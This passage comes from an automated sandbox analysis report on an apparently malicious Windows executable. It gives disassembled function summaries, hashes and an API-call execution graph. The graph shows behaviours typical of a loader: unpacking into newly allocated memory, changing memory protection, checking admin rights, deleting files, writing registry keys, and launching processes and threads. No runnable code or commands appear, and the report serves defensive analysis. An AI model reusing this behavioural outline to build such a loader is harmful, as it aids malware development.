                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                            • String ID: string too long
                                                                                                                            • API String ID: 2168136238-2556327735
                                                                                                                            • Opcode ID: 1fd2142447da2e044669f03224e11332830e892fac9e1adb6ec76c5ab22c26e8
                                                                                                                            • Instruction ID: 05e0c882fe5706ff57867631edca58e8bcb26a3d6a6b88c2d51c5a980bb1849a
                                                                                                                            • Opcode Fuzzy Hash: 1fd2142447da2e044669f03224e11332830e892fac9e1adb6ec76c5ab22c26e8
                                                                                                                            • Instruction Fuzzy Hash: 9F2187B13046504BE635895C9B88A2BF7E9EB91714F60093BF1919B7C1C7BA9C40C7AD
                                                                                                                            Function 00402850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402864
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423DFF
                                                                                                                              • Part of subcall function 00423DEA: __CxxThrowException@8.LIBCMT ref: 00423E14
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423E25
                                                                                                                            • _memmove.LIBCMT ref: 004028AC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                            • String ID: string too long
                                                                                                                            • API String ID: 1785806476-2556327735
                                                                                                                            • Opcode ID: 1d5242a16f479ea2528b7710ebb57e5956869445dee1eae38c4e78c122620ff5
                                                                                                                            • Instruction ID: a87e7afb56152db4844304120ccc90d2fc77c79901bbf4eb6c8e40b04049be80
                                                                                                                            • Opcode Fuzzy Hash: 1d5242a16f479ea2528b7710ebb57e5956869445dee1eae38c4e78c122620ff5
                                                                                                                            • Instruction Fuzzy Hash: 1F110A371042105FEB24AD78A9C492BB798AB51324F204B3FE043926C1D7B9A84883A8
                                                                                                                            Function 004027B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 004027C5
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423DFF
                                                                                                                              • Part of subcall function 00423DEA: __CxxThrowException@8.LIBCMT ref: 00423E14
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423E25
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 004027D8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                            • String ID: string too long
                                                                                                                            • API String ID: 963545896-2556327735
                                                                                                                            • Opcode ID: e292998421c8850a8da27620129f75394902549db40150187a796ef03a5c47e1
                                                                                                                            • Instruction ID: 064f40435e796dd26839fa1375d31275acd9165a4ba9a5abda85382cd89090f1
                                                                                                                            • Opcode Fuzzy Hash: e292998421c8850a8da27620129f75394902549db40150187a796ef03a5c47e1
                                                                                                                            • Instruction Fuzzy Hash: E811963A3047408BC3219E2CA944A16BBA5EBE2721F20467FE591977C1C7BAD805C3B9
                                                                                                                            Function 00402D50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402D5F
                                                                                                                              • Part of subcall function 00423E37: std::exception::exception.LIBCMT ref: 00423E4C
                                                                                                                              • Part of subcall function 00423E37: __CxxThrowException@8.LIBCMT ref: 00423E61
                                                                                                                              • Part of subcall function 00423E37: std::exception::exception.LIBCMT ref: 00423E72
                                                                                                                            • memmove.NTDLL(?,?,?,BFE90404,?,00402C55,00000004,?,?,?,004029B9,?,?,?,?,004010F4), ref: 00402D94
                                                                                                                            Strings
                                                                                                                            • invalid string position, xrefs: 00402D5A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                            • String ID: invalid string position
                                                                                                                            • API String ID: 1659287814-1799206989
                                                                                                                            • Opcode ID: 524a9378a5a4f359fa1b0d4246d43ae4ae0b0adc6430cbb09bf08ebab24e15fe
                                                                                                                            • Instruction ID: 1e4575317af22723dfc90c34203210abb019d66f2972e1f8230296fd7d489ede
                                                                                                                            • Opcode Fuzzy Hash: 524a9378a5a4f359fa1b0d4246d43ae4ae0b0adc6430cbb09bf08ebab24e15fe
                                                                                                                            • Instruction Fuzzy Hash: C201A2303007018BD7258E6CEE98A2AB7F6AFC5745B24093ED081D77C9D7B9DC428798
                                                                                                                            Function 0041F020 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: $gj
                                                                                                                            • API String ID: 2102423945-3974221788
                                                                                                                            • Opcode ID: 9492d8ccc2bcfc155a5516b9733526ba628274b6d30875e9f499e807b6103a50
                                                                                                                            • Instruction ID: d25502b6da0a0b66c229d91c22a28d008414b337d080cb476d7c62a5e50183e0
                                                                                                                            • Opcode Fuzzy Hash: 9492d8ccc2bcfc155a5516b9733526ba628274b6d30875e9f499e807b6103a50
                                                                                                                            • Instruction Fuzzy Hash: 6B016D76D0021C9BDB20EFA9D8416DDFB78AB49744F60425EE8147B342CB755906CFC9
                                                                                                                            Function 00402BB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402BC0
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423DFF
                                                                                                                              • Part of subcall function 00423DEA: __CxxThrowException@8.LIBCMT ref: 00423E14
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423E25
                                                                                                                            • memmove.NTDLL(00000000,00000000,?,?,?,?,00402953,?,?,00000000,004011DD,BFE90404), ref: 00402BE1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                            • String ID: vector<T> too long
                                                                                                                            • API String ID: 1659287814-3788999226
                                                                                                                            • Opcode ID: c6f7fdbf214584f24f2236947a8c376ea8ecc5d3ecf50827547b74c81ed7cedf
                                                                                                                            • Instruction ID: 10d1b064c231672210bfe90d05fe3dc5ef501a4c2abe29e0a963277fe7030e2b
                                                                                                                            • Opcode Fuzzy Hash: c6f7fdbf214584f24f2236947a8c376ea8ecc5d3ecf50827547b74c81ed7cedf
                                                                                                                            • Instruction Fuzzy Hash: 03F06D712006055FD310DF69E98592AB7E9EF44305710452EE5A6D3691E774F9408668
                                                                                                                            Function 0042F574 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042F05E: __getptd.LIBCMT ref: 0042F064
                                                                                                                              • Part of subcall function 0042F05E: __getptd.LIBCMT ref: 0042F074
                                                                                                                            • __getptd.LIBCMT ref: 0042F583
                                                                                                                              • Part of subcall function 00427576: __getptd_noexit.LIBCMT ref: 00427579
                                                                                                                              • Part of subcall function 00427576: __amsg_exit.LIBCMT ref: 00427586
                                                                                                                            • __getptd.LIBCMT ref: 0042F591
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                            • String ID: csm
                                                                                                                            • API String ID: 803148776-1018135373
                                                                                                                            • Opcode ID: 64e00e1577d43083ef32b3e8309f32e47d8481fc8a4d00176b3c120d1de4a5f9
                                                                                                                            • Instruction ID: e75760c1bfef3e269cdcdd64ebb75afa0e19efd270901459a5b22df1476f12ef
                                                                                                                            • Opcode Fuzzy Hash: 64e00e1577d43083ef32b3e8309f32e47d8481fc8a4d00176b3c120d1de4a5f9
                                                                                                                            • Instruction Fuzzy Hash: FB012874A00225ABCF349F62E450AAEB3F5AF14315FD4483FE44196792DB3899C9CB49
                                                                                                                            Function 0042950E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __lock.LIBCMT ref: 0042951F
                                                                                                                              • Part of subcall function 0042A4BB: __mtinitlocknum.LIBCMT ref: 0042A4D1
                                                                                                                              • Part of subcall function 0042A4BB: __amsg_exit.LIBCMT ref: 0042A4DD
                                                                                                                              • Part of subcall function 0042A4BB: EnterCriticalSection.KERNEL32(00000000,00000000,?,00427493,0000000D), ref: 0042A4E5
                                                                                                                            • EnterCriticalSection.KERNEL32(?,XgC,004298D7,00000001,?,00436FF8,00000010,00424C68,00436E68,0000000C,00424D04,?,XgC,00000080,756F3475), ref: 00429538
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalEnterSection$__amsg_exit__lock__mtinitlocknum
                                                                                                                            • String ID: XgC
                                                                                                                            • API String ID: 3996875869-1485261648
                                                                                                                            • Opcode ID: 65f251a41ca459828fcf54705edf6dbb2e64cc2b0def44c73ea8decc1a8a6430
                                                                                                                            • Instruction ID: 0c0e6288bb74e38c03d3acc2e6d49cf587f7ffeb63a82042cf818f3927628381
                                                                                                                            • Opcode Fuzzy Hash: 65f251a41ca459828fcf54705edf6dbb2e64cc2b0def44c73ea8decc1a8a6430
                                                                                                                            • Instruction Fuzzy Hash: 0DD012326002086BDB009B59E84AA4D37D8DB44238B948405F44DC7652DB79E8554A5C

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:11.4%
                                                                                                                            Dynamic/Decrypted Code Coverage:99.4%
                                                                                                                            Signature Coverage:2.6%
                                                                                                                            Total number of Nodes:1775
                                                                                                                            Total number of Limit Nodes:47
                                                                                                                            execution_graph 23816 41ea40 EndDialog 23819 42ec4c CloseHandle 23821 410e50 67 API calls TranslatorGuardHandler 21734 231b34 21735 231b4f 21734->21735 21736 231b61 VirtualProtect 21735->21736 21737 231b6d 21736->21737 21738 231c8c 21737->21738 21741 231c6c 21737->21741 21739 23216c RtlExitUserThread 21738->21739 21740 23215a 21739->21740 21744 2321d8 RtlExitUserThread 21740->21744 21746 231dd0 15 API calls 21741->21746 21743 231dc3 21743->21738 21745 2321e4 21744->21745 21746->21743 21747 4254e1 5 API calls ___security_init_cookie 21746->21747 21752 231e3a 21753 231e3c VirtualAlloc 21752->21753 21754 231e48 21753->21754 21770 231ebb 21754->21770 21756 231eb4 21758 231f4f 21784 231f6a 10 API calls 21758->21784 21760 231f5e 21761 231fe3 21760->21761 21762 2320b8 8 API calls 21761->21762 21764 2320ab 21762->21764 21763 232124 CreateThread 21765 232130 21763->21765 21789 4254e1 5 API calls ___security_init_cookie 21763->21789 21764->21763 21766 23216c RtlExitUserThread 21765->21766 21767 23215a 21766->21767 21768 2321d8 RtlExitUserThread 21767->21768 21769 2321e4 21768->21769 21771 231ed8 21770->21771 21772 231f4f 21771->21772 21775 231fe3 21771->21775 21785 231f6a 10 API calls 21772->21785 21774 231f5e 21774->21775 21776 2320b8 8 API calls 21775->21776 21778 2320ab 21776->21778 21777 232124 CreateThread 21779 232130 21777->21779 21787 4254e1 5 API calls ___security_init_cookie 21777->21787 21778->21777 21780 23216c RtlExitUserThread 21779->21780 21781 23215a 21780->21781 21782 2321d8 RtlExitUserThread 21781->21782 21783 231ea7 21782->21783 21783->21756 21783->21758 21783->21761 21784->21760 21788 4254e1 5 API calls ___security_init_cookie 21784->21788 21785->21774 21786 4254e1 5 API calls ___security_init_cookie 21785->21786 21791 231639 21792 231654 21791->21792 21793 231666 VirtualProtect 21792->21793 21795 231672 21793->21795 21794 231797 VirtualProtect 21794->21795 21795->21794 21796 2317d6 21795->21796 21797 230938 21798 23093a EnumWindows 21797->21798 21799 230946 21798->21799 21800 23203d 21801 23203e 21800->21801 21802 2320b8 8 API calls 21801->21802 21804 2320ab 21802->21804 21803 232124 CreateThread 21805 232130 21803->21805 21810 4254e1 5 API calls ___security_init_cookie 21803->21810 21804->21803 21806 23216c RtlExitUserThread 21805->21806 21807 23215a 21806->21807 21808 2321d8 RtlExitUserThread 21807->21808 21809 2321e4 21808->21809 23825 417260 68 API calls 23827 231e0f 15 API calls 23828 4254e1 5 API calls ___security_init_cookie 23827->23828 21815 23090d EnumWindows 23829 231013 LoadLibraryA 23831 427070 94 API calls __setmbcp 23904 402b74 RaiseException ctype __CxxThrowException@8 21820 425374 21858 4299a0 21820->21858 21822 425380 GetStartupInfoW 21823 425394 HeapSetInformation 21822->21823 21825 42539f 21822->21825 21823->21825 21859 425756 HeapCreate 21825->21859 21826 4253ed 21827 4253f8 21826->21827 22016 42534b 66 API calls 3 library calls 21826->22016 21860 4276bf GetModuleHandleW 21827->21860 21830 4253fe 21831 425409 __RTC_Initialize 21830->21831 22017 42534b 66 API calls 3 library calls 21830->22017 21885 429db2 GetStartupInfoW 21831->21885 21835 425423 GetCommandLineW 21898 42ae2c GetEnvironmentStringsW 21835->21898 21839 425433 21904 42ad7e GetModuleFileNameW 21839->21904 21841 42543d 21842 425448 21841->21842 22019 42524d 66 API calls 3 library calls 21841->22019 21908 42ab4c 21842->21908 21845 42544e 21846 425459 21845->21846 22020 42524d 66 API calls 3 library calls 21845->22020 21922 42502c 21846->21922 21849 425461 21851 42546c __wwincmdln 21849->21851 22021 42524d 66 API calls 3 library calls 21849->22021 21928 41d4d0 21851->21928 21854 42549c 22023 42522f 66 API calls _doexit 21854->22023 21857 4254a1 __commit 21858->21822 21859->21826 21861 4276d3 21860->21861 21862 4276dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress 21860->21862 22024 42740c 70 API calls _free 21861->22024 21864 427726 TlsAlloc 21862->21864 21867 427774 TlsSetValue 21864->21867 21868 427835 21864->21868 21866 4276d8 21866->21830 21867->21868 21869 427785 21867->21869 21868->21830 22025 424fd5 RtlEncodePointer EncodePointer __init_pointers _doexit __initp_misc_winsig 21869->22025 21871 42778a EncodePointer EncodePointer EncodePointer EncodePointer 22026 42a341 InitializeCriticalSectionAndSpinCount 21871->22026 21873 4277c9 21874 427830 21873->21874 21875 4277cd DecodePointer 21873->21875 22034 42740c 70 API calls _free 21874->22034 21877 4277e2 21875->21877 21877->21874 22027 42bb56 21877->22027 21880 427800 DecodePointer 21881 427811 21880->21881 21881->21874 21882 427815 21881->21882 22033 427449 66 API calls 4 library calls 21882->22033 21884 42781d GetCurrentThreadId 21884->21868 21886 42bb56 __calloc_crt 66 API calls 21885->21886 21888 429dd0 21886->21888 21887 425417 21887->21835 22018 42524d 66 API calls 3 library calls 21887->22018 21888->21887 21890 42bb56 __calloc_crt 66 API calls 21888->21890 21892 429f45 21888->21892 21897 429ec5 21888->21897 21889 429f7b GetStdHandle 21889->21892 21890->21888 21891 429fdf SetHandleCount 21891->21887 21892->21889 21892->21891 21893 429f8d GetFileType 21892->21893 21896 429fb3 InitializeCriticalSectionAndSpinCount 21892->21896 21893->21892 21894 429ef1 GetFileType 21895 429efc InitializeCriticalSectionAndSpinCount 21894->21895 21894->21897 21895->21887 21895->21897 21896->21887 21896->21892 21897->21892 21897->21894 21897->21895 21899 42ae41 21898->21899 21900 42ae3d 21898->21900 22072 42bb11 21899->22072 21900->21839 21902 42ae63 _memmove 21903 42ae6a FreeEnvironmentStringsW 21902->21903 21903->21839 21905 42adb3 _wparse_cmdline 21904->21905 21906 42bb11 __malloc_crt 66 API calls 21905->21906 21907 42adf6 _wparse_cmdline 21905->21907 21906->21907 21907->21841 21909 42ab64 _wcslen 21908->21909 21913 42ab5c 21908->21913 21910 42bb56 __calloc_crt 66 API calls 21909->21910 21915 42ab88 _wcslen 21910->21915 21911 42abde 21912 424005 _free 66 API calls 21911->21912 21912->21913 21913->21845 21914 42bb56 __calloc_crt 66 API calls 21914->21915 21915->21911 21915->21913 21915->21914 21916 42ac04 21915->21916 21919 42ac1b 21915->21919 22100 424895 21915->22100 21917 424005 _free 66 API calls 21916->21917 21917->21913 22109 425a10 21919->22109 21921 42ac27 21921->21845 21923 42503a __IsNonwritableInCurrentImage 21922->21923 22128 42a7f2 21923->22128 21925 425058 __initterm_e 21927 425079 __IsNonwritableInCurrentImage 21925->21927 22131 42695b 76 API calls __cinit 21925->22131 21927->21849 22132 42c690 21928->22132 21932 41d52e CoInitializeEx AllocateAndInitializeSid 21933 41d57a CheckTokenMembership 21932->21933 21934 41d5ac SHGetFolderPathW 21932->21934 21935 41d593 21933->21935 21936 41d599 FreeSid 21933->21936 22135 421aa0 21934->22135 21935->21936 21936->21934 21938 41d5e6 CoCreateInstance CoCreateInstance 21939 41d65b 21938->21939 21940 41d68c ExitProcess 21939->21940 21941 41d694 _memset 21939->21941 21945 41d706 21941->21945 22284 425203 66 API calls _doexit 21941->22284 21943 41dc33 21944 423ebb TranslatorGuardHandler 5 API calls 21943->21944 21946 41dc50 21944->21946 21945->21943 21947 41d753 21945->21947 22285 425203 66 API calls _doexit 21945->22285 21946->21854 22022 425203 66 API calls _doexit 21946->22022 21949 41d76a 21947->21949 22286 425203 66 API calls _doexit 21947->22286 21951 41d784 7 API calls 21949->21951 22287 425203 66 API calls _doexit 21949->22287 22145 424820 21951->22145 21955 424820 __NMSG_WRITE 66 API calls 21956 41d80d 21955->21956 21957 424820 __NMSG_WRITE 66 API calls 21956->21957 21958 41d821 SHGetFolderPathW SHGetFolderPathW GetModuleFileNameW 21957->21958 21959 424895 __wcsdup 66 API calls 21958->21959 21960 41d861 21959->21960 21961 424820 __NMSG_WRITE 66 API calls 21960->21961 21962 41d875 DeleteFileW 21961->21962 22154 41e7a0 CreateFileW 21962->22154 21965 41d8a4 22157 41e810 GetCurrentProcess OpenProcessToken 21965->22157 21966 41d8af 22164 41ddd0 21966->22164 21969 41d8bb 21970 41d8f3 21969->21970 21973 41d8d1 21969->21973 21974 41d90e CreateMutexW GetLastError 21970->21974 22183 41dee0 21970->22183 21972 41d906 21972->21943 21972->21974 21973->21974 21975 41d8dc 21973->21975 21974->21943 21977 41d92c _memset 21974->21977 22288 41ed00 99 API calls TranslatorGuardHandler 21975->22288 21979 41d93c GetVersionExW 21977->21979 21978 41d8e1 21978->21943 22289 41d210 12 API calls 2 library calls 21978->22289 22202 401bf0 21979->22202 21982 41d8ee 21982->21943 21983 41d959 22213 41e150 RegCreateKeyExW RegSetValueExW RegFlushKey RegCloseKey RegCreateKeyExW 21983->22213 21985 41d95e 22218 41efe0 21985->22218 21988 41efe0 97 API calls 21989 41d9ef CreateThread 21988->21989 21990 41da1c _memset 21989->21990 23582 41d390 21989->23582 22221 424cd4 21990->22221 21993 41da7c 21996 41da92 CreateThread 21993->21996 21997 41daaa CreateThread CreateThread SetThreadPriority WaitForSingleObject 21993->21997 21995 41da70 22254 424f0c 21995->22254 21996->21997 23551 41a030 21996->23551 22267 41dc60 21997->22267 23520 41e5b0 21997->23520 23537 413780 21997->23537 22000 41dae7 _memset 22290 42441c 22000->22290 22003 424820 __NMSG_WRITE 66 API calls 22004 41db33 ShellExecuteW 22003->22004 22005 42441c __NMSG_WRITE 66 API calls 22004->22005 22006 41db6a 22005->22006 22007 424820 __NMSG_WRITE 66 API calls 22006->22007 22008 41db80 ShellExecuteW 22007->22008 22009 42441c __NMSG_WRITE 66 API calls 22008->22009 22010 41dbb4 22009->22010 22011 424820 __NMSG_WRITE 66 API calls 22010->22011 22012 41dbca 22011->22012 22299 41e3f0 32 API calls TranslatorGuardHandler 22012->22299 22014 41dbd6 ShellExecuteW CreateThread WaitForSingleObject CreateThread WaitForSingleObject 22300 41e050 70 API calls 3 library calls 22014->22300 22016->21827 22017->21831 22022->21854 22023->21857 22024->21866 22025->21871 22026->21873 22029 42bb5f 22027->22029 22030 4277f8 22029->22030 22031 42bb7d Sleep 22029->22031 22035 42cac0 22029->22035 22030->21874 22030->21880 22032 42bb92 22031->22032 22032->22029 22032->22030 22033->21884 22034->21868 22036 42cacc 22035->22036 22042 42cae7 22035->22042 22037 42cad8 22036->22037 22036->22042 22044 42570d 22037->22044 22039 42cafa RtlAllocateHeap 22041 42cb21 22039->22041 22039->22042 22041->22029 22042->22039 22042->22041 22047 426981 DecodePointer 22042->22047 22048 4274fd GetLastError 22044->22048 22046 425712 22046->22029 22047->22042 22062 4273d8 TlsGetValue 22048->22062 22051 42756a SetLastError 22051->22046 22052 42bb56 __calloc_crt 62 API calls 22053 427528 22052->22053 22053->22051 22054 427530 DecodePointer 22053->22054 22055 427545 22054->22055 22056 427561 22055->22056 22057 427549 22055->22057 22066 424005 22056->22066 22065 427449 66 API calls 4 library calls 22057->22065 22060 427551 GetCurrentThreadId 22060->22051 22061 427567 22061->22051 22063 427408 22062->22063 22064 4273ed RtlDecodePointer TlsSetValue 22062->22064 22063->22051 22063->22052 22064->22063 22065->22060 22067 424010 HeapFree 22066->22067 22071 424039 _free 22066->22071 22068 424025 22067->22068 22067->22071 22069 42570d __commit 64 API calls 22068->22069 22070 42402b GetLastError 22069->22070 22070->22071 22071->22061 22075 42bb1a 22072->22075 22074 42bb50 22074->21902 22075->22074 22076 42bb31 Sleep 22075->22076 22078 424b82 22075->22078 22077 42bb46 22076->22077 22077->22074 22077->22075 22079 424bff 22078->22079 22083 424b90 22078->22083 22099 426981 DecodePointer 22079->22099 22081 424c05 22084 42570d __commit 65 API calls 22081->22084 22082 424b9b 22082->22083 22095 4293bd 66 API calls __NMSG_WRITE 22082->22095 22096 42920e 66 API calls 7 library calls 22082->22096 22097 424fab GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 22082->22097 22083->22082 22086 424bbe RtlAllocateHeap 22083->22086 22089 424beb 22083->22089 22093 424be9 22083->22093 22098 426981 DecodePointer 22083->22098 22087 424bf7 22084->22087 22086->22083 22086->22087 22087->22075 22092 42570d __commit 65 API calls 22089->22092 22092->22093 22094 42570d __commit 65 API calls 22093->22094 22094->22087 22095->22082 22096->22082 22098->22083 22099->22081 22101 4248aa 22100->22101 22102 4248a3 22100->22102 22103 42570d __commit 66 API calls 22101->22103 22102->22101 22107 4248cb 22102->22107 22104 4248af 22103->22104 22112 425a62 11 API calls __commit 22104->22112 22106 4248b9 22106->21915 22107->22106 22108 42570d __commit 66 API calls 22107->22108 22108->22104 22113 4258e7 22109->22113 22112->22106 22114 425906 _memset __call_reportfault 22113->22114 22115 425924 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 22114->22115 22116 4259f2 __call_reportfault 22115->22116 22119 423ebb 22116->22119 22118 425a0e GetCurrentProcess TerminateProcess 22118->21921 22120 423ec3 22119->22120 22121 423ec5 IsDebuggerPresent 22119->22121 22120->22118 22127 42af1f 22121->22127 22124 425604 SetUnhandledExceptionFilter UnhandledExceptionFilter 22125 425621 __call_reportfault 22124->22125 22126 425629 GetCurrentProcess TerminateProcess 22124->22126 22125->22126 22126->22118 22127->22124 22129 42a7f8 EncodePointer 22128->22129 22129->22129 22130 42a812 22129->22130 22130->21925 22131->21927 22133 41d4ec LoadStringW LoadStringW 22132->22133 22134 41e8a0 LoadIconW LoadCursorW LoadIconW RegisterClassExW 22133->22134 22134->21932 22136 421b00 22135->22136 22137 421aae 22135->22137 22136->21938 22138 421ab0 GetTickCount 22137->22138 22301 425318 22138->22301 22141 421abc 22142 425318 66 API calls 22141->22142 22304 42532a 22141->22304 22143 421adb Sleep 22142->22143 22143->22138 22144 421af2 22143->22144 22144->21938 22146 424835 22145->22146 22148 42482e 22145->22148 22147 42570d __commit 66 API calls 